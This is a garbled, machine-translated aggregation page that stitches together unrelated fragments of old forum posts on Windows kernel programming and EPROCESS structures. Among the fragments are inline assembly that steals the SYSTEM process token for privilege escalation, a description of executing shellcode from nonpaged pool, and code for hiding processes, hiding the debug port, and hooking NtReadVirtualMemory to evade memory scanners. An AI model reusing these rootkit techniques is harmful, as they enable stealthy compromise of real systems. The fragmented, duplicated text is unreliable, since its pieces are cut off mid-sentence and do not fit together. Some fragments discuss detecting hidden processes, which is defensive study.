It is relatively simple to get a process-loaded related module under R3, and it is possible to get the module associated with the process directly through the TOOLHELP32 Library API, but since it has been mixed in R0 to use the R3 layer, it makes no sense. So here's the little yo here will be a part of how to get to the process load module under R0 through the eprocess structure.FirstHere we first introduce the general idea of our query through
Google found that many of them directly obtained the process structure system_process_information through zwquerysysteminformation on the 11th, which is insufficient to express detailed process information. So I want to use this to view the detailed eprocess structure. The method can be obtained through the function pslookupprocessbyprocessid. The function prototype is given below.
typedef struct _SYSTEM_PROCESS_INFORMATION { ULONG
Previous article take the path under XP too troublesome
Since it is stipulated in the XP system, why not hard-coded it.
All right, walk up ~ ~ ~
Pfile_object __declspec (naked) __stdcall _mmgetfileobjectforsection (PVOID section)
{
__asm
{
Author: sinisterInformation Source: white blood cells
Author: sinisterEmail: sinister@whitecell.orgHomepage: http://www.whitecell.org Date: 2005-11-16
2005-2-15
As we all know, nt kernel runs in a multi-task Preemptive test mode. On a non-SMP system, each process assigns a uniqueSet the CPU time slice to achieve the execution purpose, it looks like multiple tasks are running at the same time. Nt kernelIt also takes thread scheduling as the core, so that thread switching means switching of the cu
Manipulating processes in the kernelIn the kernel operation process, I believe is a lot of WINDOWS kernel programming interested in the first learning point of knowledge of a friend. But here, I want to let everyone down, the operation process in the kernel is nothing special, in terms of the standard method, still call the process-related NATIVE API (of course, this article refers to the process operation, also includes the operation of the thread and DLL module). This article consists of 10 pa
reduces IRQL.(Interrupt request level.
We pass nonpagedpool as a parameter to exallocatepool, then copy the shell code to the non-paged area, and then simply execute a JMP command to this memory area. Now, all the code can be safely executed without being affected.
When injecting drivers, we must be aware of the current IRQL. IRQL is the current hardware priority of a specified kernel program. Many kernel programs request IRQLPassive (0 ). If it runs at dispatch (2) level (used for pr
Title: [original] Hide Your debugport in ring0Author: wowelfTime: 2009-01-26, 11: 00: 30Chain: http://bbs.pediy.com/showthread.php? T = 80971When a program is debugged by the ring3 debugger, many debugging features can be detected. This forum also has a special post for details, however, there is a very fundamental identifier ring3 that few people can detect, namely _ eprocess. debugport. Debugport is very important for the ring3 debugger. Without its
. Get the thread number through psgetcurrentthreadid. Note that this thread is not the thread to be created, but the thread that contains the code for creating the thread.
The Code then calls an undisclosed function pslookupprocessbyprocessid to obtain the eprocess structure of a process. The eprocess structure is carried by w2kundoc in kmdkit. INC has a detailed description, saving the process name in the
. Get the thread number through psgetcurrentthreadid. Note that this thread is not the thread to be created, but the thread that contains the code for creating the thread.
The Code then calls an undisclosed function pslookupprocessbyprocessid to obtain the eprocess structure of a process. The eprocess structure is carried by w2kundoc in kmdkit. INC has a detailed description, saving the process name in the
: inhandleprocesshandle,inpvoidbaseaddress,outpvoidbuffer,inulongbufferlength, outpulongreturnlengthoptional function: Hide the memory of the protection module, if the memory is found to scan this block of memory, then return the encrypted data to disrupt the scan process return: ntstatus--*/ Ntstatusmyntreadvirtualmemory (Inhandleprocesshandle,inpvoidbaseaddress,outpvoidbuffer,inulongbufferlength, outpulongreturnlengthoptional) {ntstatusstatus; peprocesseprocess; PVOIDPEB; Ppeb_ldr_datapebldrda
handle table, step-by-step development is gradually becoming more powerful. Some techniques and methods are beginning to emerge and become popular, such as futo and phide_ex ......
The method of checking and testing hidden processes can combine some popular methods. First, you can scan one side by using the process activity linked list activeprocesslinks in the eprocess structure of the process, you can use the handle_table and handletablelis linked
)MoV eax, [eax]
MoV ESI, [eax + 0x220]MoV eax, ESI
Searchxp:
MoV eax, [eax + 0x88]Sub eax, 0x88MoV edX, [eax + 0x84]CMP edX, 0x4 // you can use a PID to find system processes.JNE searchxp
MoV eax, [eax + 0xc8] // get the token of the system processMoV [ESI + 0xc8], eax // modify the token of the current process
RET 8
}}
If (osversioninfo. dwminorversion = 2 ){
_ ASM {
NOPNOPNOPNOPNOPNOP
MoV eax, 0xffdff124 // eax = kpcr (not 3G Mode)MoV eax, [eax]
MoV ESI, [eax + 0x218]MoV eax, ESI
Search2003:
M
Hidden process and recovery (with code) and Process Code
First, we know that the process body EPROCESS is maintained by the system in a two-way linked list LIST_ENTRY. Therefore, we only need to remove the process EPROCESS from this linked list to implement process hiding, of course, this can only hide the Process Manager and zwQuerySystemInformation. The process hidden by the broken chain can still be foun
Pspcidtable holds all process and thread objects in the system, which are either the process ID (PID) or the thread ID (TID). Let's look at the handle_table structure in WinDbg first:You can see that the content stored in address 0x83f41bc4 is 0x 8da010a8, which is the structure of the system's _handle_table.Well, now WinDbg is getting handle_table structure, or code implementation. Here is a simple plus offset:Eprocess address of the system processPeprocess
(* Pcreate_process_policy_routine )(In handle parentid,In handle processid,In Boolean create);
NtstatusPssetcreatethreadpolicyroutine (In pcreate_thread_policy_routine policyroutine);
Void(* Pcreate_thread_policy_routine )(In handle processid,In handle threadid,In Boolean create);
The original form shows that the callback function only provides the process ID/thread ID. Not providedProcess name. Then we need to further obtain the process name through the process ID. This requires an undisclosedF
Author: bzhkl
Time: 2008-12-11,12: 01
Chain: http://bbs.pediy.com/showthread.php? T = 78464
Previously, I tried to detect a hidden process and then solved it with the method of brute force enumeration. But the hook swapcontext didn't see complete code. So I collected some useful modules on the Internet and integrated them to implement support. xp3, xp2 should be supported even if it is not tested.
Complete project code
Difficulty: there are still some details about obtaining the swapcontext ad
process. The information we need to find is a pointer to the EPROCESS structure. The EPROCESS structure is used to represent the main kernel data structure of a process. You can see the information that contains the "DT _ EPROCESS" (dump type in the EPROCESS structure. To find the
Recently in learning kernel programming, record recent study notes.Principle: Remove the current process from the list of eprocess structuresCan't be! Process 0 0 See#include"HideProcess.h"#ifdef WIN64#defineActiveprocesslinks_eprocess 0x188#defineImagefilename_eprocess 0x2e0//a 16-byte single word group#else#defineActiveprocesslinks_eprocess 0x088#defineImagefilename_eprocess 0x174//a 16-byte single word group#endifNTSTATUS driverentry (pdriver_objec
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.